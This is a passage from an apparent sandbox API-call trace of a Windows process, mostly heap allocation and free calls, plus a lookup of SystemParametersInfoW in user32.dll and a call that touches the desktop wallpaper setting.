Size=0x10) returned 0x2e51928 [0294.597] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51910 | out: hHeap=0x970000) returned 1 [0294.597] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b50 | out: hHeap=0x970000) returned 1 [0294.597] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b08 | out: hHeap=0x970000) returned 1 [0294.597] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0294.597] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0294.597] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51940 [0294.597] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b28 [0294.597] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b80 [0294.597] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519d0 [0294.597] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b58 [0294.597] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54490 [0294.598] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b08 [0294.598] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b68 [0294.598] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b50 [0294.598] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51bb0 [0294.598] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c88 [0294.598] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b80 | out: hHeap=0x970000) returned 1 [0294.598] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b68 [0294.598] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a00 [0294.598] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c18 [0294.598] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a60 [0294.598] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0294.598] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519a0 [0294.598] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b98 [0294.598] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51910 [0294.598] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b98 | out: hHeap=0x970000) returned 1 [0294.598] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a48 [0294.598] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b78 [0294.598] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519b8 [0294.598] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b78 | out: hHeap=0x970000) returned 1 [0294.598] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51aa8 [0294.598] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c18 [0294.598] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b80 [0294.635] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0294.635] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e541c0 [0294.635] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b68 | out: hHeap=0x970000) returned 1 [0294.636] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a18 [0294.636] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bc8 [0294.636] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0294.636] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a30 [0294.636] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b78 [0294.636] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b68 [0294.636] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b78 | out: hHeap=0x970000) returned 1 [0294.636] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ac0 [0294.636] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bd8 [0294.636] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bd8 | out: hHeap=0x970000) returned 1 [0294.636] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51be0 [0294.636] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c48 [0294.636] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d18 [0294.636] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c48 | out: hHeap=0x970000) returned 1 [0294.636] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78858 [0294.636] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e541c0 | out: hHeap=0x970000) returned 1 [0294.636] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51bc8 [0294.636] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c48 [0294.637] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c48 | out: hHeap=0x970000) returned 1 [0294.637] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e20 [0294.637] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c28 [0294.637] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d90 [0294.637] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c28 | out: hHeap=0x970000) returned 1 [0294.637] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c58 [0294.637] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bc8 [0294.637] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0294.637] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b78 [0294.637] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e38 [0294.637] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0294.637] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d30 [0294.637] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cb8 [0294.637] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b98 [0294.637] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e08 [0294.637] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d30 | out: hHeap=0x970000) returned 1 [0294.637] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0294.637] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e08 | out: hHeap=0x970000) returned 1 [0294.637] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b98 | out: hHeap=0x970000) returned 1 [0294.638] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c40 [0294.638] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cb8 [0294.638] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51df0 [0294.638] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54be8 [0294.638] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b98 [0294.638] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51eb0 [0294.638] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51df0 | out: hHeap=0x970000) returned 1 [0294.638] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54be8 | out: hHeap=0x970000) returned 1 [0294.638] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51eb0 | out: hHeap=0x970000) returned 1 [0294.638] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b98 | out: hHeap=0x970000) returned 1 [0294.638] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cf8 [0294.638] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c70 [0294.638] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cd8 [0294.638] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ce8 [0294.638] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51da8 [0294.638] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c70 | out: hHeap=0x970000) returned 1 [0294.638] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0294.638] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51da8 | out: hHeap=0x970000) returned 1 [0294.638] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ce8 | out: hHeap=0x970000) returned 1 [0294.638] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54be8 [0294.638] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d30 [0294.638] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cd8 [0294.638] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ce8 [0294.638] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51bf8 [0294.639] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d30 | out: hHeap=0x970000) returned 1 [0294.639] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0294.639] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bf8 | out: hHeap=0x970000) returned 1 [0294.639] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ce8 | out: hHeap=0x970000) returned 1 [0294.639] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d08 [0294.639] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e50 [0294.639] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c48 [0294.639] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c18 [0294.639] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51dd8 [0294.639] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e50 | out: hHeap=0x970000) returned 1 [0294.639] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c48 | out: hHeap=0x970000) returned 1 [0294.639] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51dd8 | out: hHeap=0x970000) returned 1 [0294.639] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0294.639] LoadLibraryW (lpLibFileName="user32.dll") returned 0x750c0000 [0294.639] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51da8 [0294.639] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c68 [0294.639] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SystemParametersInfoW", cchWideChar=22, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 22 [0294.640] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x16) returned 0x2e69bc8 [0294.640] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SystemParametersInfoW", cchWideChar=22, lpMultiByteStr=0x2e69bc8, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SystemParametersInfoW", lpUsedDefaultChar=0x0) returned 22 [0294.640] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51da8 | out: hHeap=0x970000) returned 1 [0294.640] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e544e0 [0294.640] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69bc8 | out: hHeap=0x970000) returned 1 [0294.640] GetProcAddress (hModule=0x750c0000, lpProcName="SystemParametersInfoW") returned 0x750ef210 [0294.640] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e544e0 | out: hHeap=0x970000) returned 1 [0294.640] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c68 | out: hHeap=0x970000) returned 1 [0294.640] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51dc0 [0294.640] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bc8 [0294.640] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b98 [0294.640] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bb8 [0294.640] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ba8 [0294.640] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0294.640] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b98 | out: hHeap=0x970000) returned 1 [0294.640] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bb8 | out: hHeap=0x970000) returned 1 [0294.640] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ba8 | out: hHeap=0x970000) returned 1 [0294.640] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51dc0 | out: hHeap=0x970000) returned 1 [0294.640] SystemParametersInfoW (in: uiAction=0x14, uiParam=0x0, pvParam=0x0, fWinIni=0x0 | out: pvParam=0x0) returned 1 [0294.714] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2f14260 [0294.715] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69ac8 [0294.715] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c68 [0294.715] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51bf8 [0294.715] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ca0 [0294.715] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c10 [0294.715] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cd8 [0294.715] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c10 | out: hHeap=0x970000) returned 1 [0294.715] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0294.715] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ca0 | out: hHeap=0x970000) returned 1 [0294.715] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c88 [0294.715] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51cd0 [0294.715] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c70 [0294.715] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b98 [0294.715] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c70 | out: hHeap=0x970000) returned 1 [0294.715] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b98 | out: hHeap=0x970000) returned 1 [0294.715] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51cd0 | out: hHeap=0x970000) returned 1 [0294.715] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c10 [0294.715] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51dd8 [0294.715] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d48 [0294.715] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b98 [0294.715] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d48 | out: hHeap=0x970000) returned 1 [0294.715] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b98 | out: hHeap=0x970000) returned 1 [0294.715] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51dd8 | out: hHeap=0x970000) returned 1 [0294.715] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c70 [0294.715] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c28 [0294.715] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d00 [0294.715] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c18 [0294.716] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d00 | out: hHeap=0x970000) returned 1 [0294.716] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0294.716] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c28 | out: hHeap=0x970000) returned 1 [0294.716] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d00 [0294.716] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c28 [0294.716] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d48 [0294.716] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b98 [0294.716] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d48 | out: hHeap=0x970000) returned 1 [0294.716] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b98 | out: hHeap=0x970000) returned 1 [0294.716] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c28 | out: hHeap=0x970000) returned 1 [0294.716] FreeLibrary (hLibModule=0x750c0000) returned 1 [0294.716] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0294.716] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0294.716] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54be8 | out: hHeap=0x970000) returned 1 [0294.716] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d08 | out: hHeap=0x970000) returned 1 [0294.716] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c40 | out: hHeap=0x970000) returned 1 [0294.716] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e38 | out: hHeap=0x970000) returned 1 [0294.716] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b78 | out: hHeap=0x970000) returned 1 [0294.716] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a60 | out: hHeap=0x970000) returned 1 [0294.716] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a00 | out: hHeap=0x970000) returned 1 [0294.716] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51910 | out: hHeap=0x970000) returned 1 [0294.716] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519a0 | out: hHeap=0x970000) returned 1 [0294.716] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519b8 | out: hHeap=0x970000) returned 1 [0294.716] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a48 | out: hHeap=0x970000) returned 1 [0294.716] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b80 | out: hHeap=0x970000) returned 1 [0294.716] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51aa8 | out: hHeap=0x970000) returned 1 [0294.716] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a18 | out: hHeap=0x970000) returned 1 [0294.716] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b68 | out: hHeap=0x970000) returned 1 [0294.717] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a30 | out: hHeap=0x970000) returned 1 [0294.717] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ac0 | out: hHeap=0x970000) returned 1 [0294.717] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d18 | out: hHeap=0x970000) returned 1 [0294.717] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51be0 | out: hHeap=0x970000) returned 1 [0294.717] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bc8 | out: hHeap=0x970000) returned 1 [0294.717] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d90 | out: hHeap=0x970000) returned 1 [0294.717] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e20 | out: hHeap=0x970000) returned 1 [0294.717] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c58 | out: hHeap=0x970000) returned 1 [0294.717] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78858 | out: hHeap=0x970000) returned 1 [0294.717] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c88 | out: hHeap=0x970000) returned 1 [0294.717] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519d0 | out: hHeap=0x970000) returned 1 [0294.717] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b58 | out: hHeap=0x970000) returned 1 [0294.717] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bb0 | out: hHeap=0x970000) returned 1 [0294.717] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2f15c40 [0294.717] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51940 | out: hHeap=0x970000) returned 1 [0294.717] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b28 | out: hHeap=0x970000) returned 1 [0294.717] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f14260 | out: hHeap=0x970000) returned 1 [0294.717] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0294.717] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ba8 [0294.717] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ba8 | out: hHeap=0x970000) returned 1 [0294.717] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0294.717] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cb8 [0294.717] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cd8 [0294.717] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0294.717] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0294.717] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0294.717] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b98 | out: hHeap=0x970000) returned 1 [0294.717] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51970 | out: hHeap=0x970000) returned 1 [0294.718] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0294.718] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e79310 | out: hHeap=0x970000) returned 1 [0294.718] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51988 | out: hHeap=0x970000) returned 1 [0294.718] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519e8 | out: hHeap=0x970000) returned 1 [0294.718] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0294.718] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54080 | out: hHeap=0x970000) returned 1 [0294.718] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51928 | out: hHeap=0x970000) returned 1 [0294.718] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518c8 | out: hHeap=0x970000) returned 1 [0294.718] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0294.718] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e543a0 | out: hHeap=0x970000) returned 1 [0294.718] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51af0 | out: hHeap=0x970000) returned 1 [0294.718] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b20 | out: hHeap=0x970000) returned 1 [0294.718] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b88 | out: hHeap=0x970000) returned 1 [0294.718] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e79338 | out: hHeap=0x970000) returned 1 [0294.718] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bf8 | out: hHeap=0x970000) returned 1 [0294.718] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c88 | out: hHeap=0x970000) returned 1 [0294.718] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c10 | out: hHeap=0x970000) returned 1 [0294.718] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c70 | out: hHeap=0x970000) returned 1 [0294.718] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d00 | out: hHeap=0x970000) returned 1 [0294.718] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69ac8 | out: hHeap=0x970000) returned 1 [0294.718] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c68 | out: hHeap=0x970000) returned 1 [0294.718] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f15c40 | out: hHeap=0x970000) returned 1 [0294.718] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b50 | out: hHeap=0x970000) returned 1 [0294.718] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b08 | out: hHeap=0x970000) returned 1 [0294.718] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b68 | out: hHeap=0x970000) returned 1 [0294.718] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54490 | out: 